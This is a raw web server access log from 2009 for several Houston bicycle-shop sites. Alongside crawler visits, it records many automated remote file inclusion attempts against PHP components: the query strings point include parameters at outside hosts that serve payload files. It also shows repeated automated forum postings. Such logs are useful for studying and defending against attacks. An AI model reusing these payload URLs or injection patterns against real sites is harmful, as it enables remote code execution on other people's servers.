87.230.9.68 - - [12/Jul/2009:21:39:51 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "houstonbikeshop.com"
65.55.108.195 - - [12/Jul/2009:21:40:46 -0700] "GET /logs/access_080910.log HTTP/1.1" 200 1245184 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
119.63.193.75 - - [12/Jul/2009:21:47:03 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [12/Jul/2009:21:49:04 -0700] "GET /bullitinboard/viewtopic.php?p=11516 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
194.8.75.94 - - [12/Jul/2009:21:56:03 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
194.8.75.94 - - [12/Jul/2009:21:56:03 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
194.8.75.94 - - [12/Jul/2009:21:56:03 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
87.98.222.18 - - [12/Jul/2009:22:00:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:00:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:00:16 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:06:27 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:22:26:25 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:22:26:25 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:22:26:26 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:22:26:26 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:22:26:27 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:33:58 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:33:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.98.222.18 - - [12/Jul/2009:22:33:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:22:59:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:22:59:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
65.55.211.73 - - [12/Jul/2009:23:03:28 -0700] "GET /logs/?D=A HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:23:08:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:23:08:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.211.73 - - [12/Jul/2009:23:11:53 -0700] "GET /?M=D HTTP/1.1" 200 1764 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:23:14:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:23:14:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:23:30:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
218.232.66.36 - - [12/Jul/2009:23:33:39 -0700] "GET /translations/Portuguese_BR.txt%20%20/index.php?visualizar=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.232.66.36 - - [12/Jul/2009:23:33:39 -0700] "GET /index.php?visualizar=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.232.66.36 - - [12/Jul/2009:23:33:39 -0700] "GET /translations/index.php?visualizar=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.10.140.174 - - [12/Jul/2009:23:33:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://83.3.132.70/iGeoMap/www//tmp/v2-id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
85.10.140.174 - - [12/Jul/2009:23:33:53 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://83.3.132.70/iGeoMap/www//tmp/v2-id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:23:39:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:23:46:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:00:05:28 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:00:05:30 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:00:05:30 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:00:05:32 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [13/Jul/2009:00:05:32 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
194.8.74.11 - - [13/Jul/2009:00:11:59 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.svbikes.com"
194.8.74.11 - - [13/Jul/2009:00:11:59 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.svbikes.com"
194.8.74.11 - - [13/Jul/2009:00:12:00 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:00:17:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
194.8.75.92 - - [13/Jul/2009:00:23:02 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.svbikes.com"
194.8.75.92 - - [13/Jul/2009:00:23:02 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.svbikes.com"
194.8.75.92 - - [13/Jul/2009:00:23:02 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.svbikes.com"
91.121.150.170 - - [13/Jul/2009:00:28:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.51.115 - - [13/Jul/2009:00:34:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [13/Jul/2009:00:34:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:39:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:39:24 -0700] "GET /skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:39:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:40:18 -0700] "GET /skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:40:18 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:40:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:41:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:41:59 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:41:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.131 - - [13/Jul/2009:00:43:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
117.74.99.225 - - [13/Jul/2009:00:44:12 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:44:12 -0700] "GET /skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:44:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.192.120.182 - - [13/Jul/2009:00:44:46 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.99.225 - - [13/Jul/2009:00:49:35 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.105.207.244 - - [13/Jul/2009:00:49:35 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.105.207.244 - - [13/Jul/2009:00:49:35 -0700] "GET /skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.105.207.244 - - [13/Jul/2009:00:49:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.142.209.134 - - [13/Jul/2009:00:58:35 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
80.247.76.181 - - [13/Jul/2009:01:05:01 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
80.247.76.181 - - [13/Jul/2009:01:05:01 -0700] "GET /logs//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
80.247.76.181 - - [13/Jul/2009:01:05:01 -0700] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
38.100.41.113 - - [13/Jul/2009:01:09:09 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.8.74.47 - - [13/Jul/2009:01:10:24 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)" "www.svbikes.com"
194.8.74.47 - - [13/Jul/2009:01:10:24 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)" "www.svbikes.com"
194.8.74.47 - - [13/Jul/2009:01:10:25 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)" "www.svbikes.com"
38.100.41.113 - - [13/Jul/2009:01:11:25 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:28 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:31 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:32 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:33 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:36 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:37 -0700] "GET /blog/ HTTP/1.1" 401 395 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:11:39 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.8.74.157 - - [13/Jul/2009:01:11:57 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
194.8.74.157 - - [13/Jul/2009:01:11:57 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
194.8.74.157 - - [13/Jul/2009:01:11:59 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
38.100.41.113 - - [13/Jul/2009:01:14:05 -0700] "GET /Accessories.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:06 -0700] "GET /contactus.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:09 -0700] "GET /Bikes.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:09 -0700] "GET /Product.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:11 -0700] "GET /services.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:13 -0700] "GET /aboutus.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:15 -0700] "GET /Clinc.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:16 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "http://www.bicyclestoreshouston.com/tmp/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:17 -0700] "GET /Rides.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:17 -0700] "GET /index.html HTTP/1.1" 404 275 "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:18 -0700] "GET /logs/access_090610.log HTTP/1.1" 200 65536 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:19 -0700] "GET /logs/access_090310.log HTTP/1.1" 200 131072 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:20 -0700] "GET /logs/access_081010.log HTTP/1.1" 200 262144 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:21 -0700] "GET /logs/access_090510.log HTTP/1.1" 200 262144 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:21 -0700] "GET /logs/access_080910.log HTTP/1.1" 200 196608 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:22 -0700] "GET /logs/access_090410.log HTTP/1.1" 200 131072 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:22 -0700] "GET /logs/access_081110.log HTTP/1.1" 200 131072 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:23 -0700] "GET /logs/access.log HTTP/1.1" 200 196608 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:24 -0700] "GET /logs/access_090110.log HTTP/1.1" 200 196608 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:24 -0700] "GET /logs/access_090710.log HTTP/1.1" 200 65536 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:24 -0700] "GET /logs/access_081210.log HTTP/1.0" 200 262144 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:25 -0700] "GET /logs/access_090210.log HTTP/1.1" 200 131072 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.113 - - [13/Jul/2009:01:14:25 -0700] "GET /translations/Czech.txt HTTP/1.1" 200 33290 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
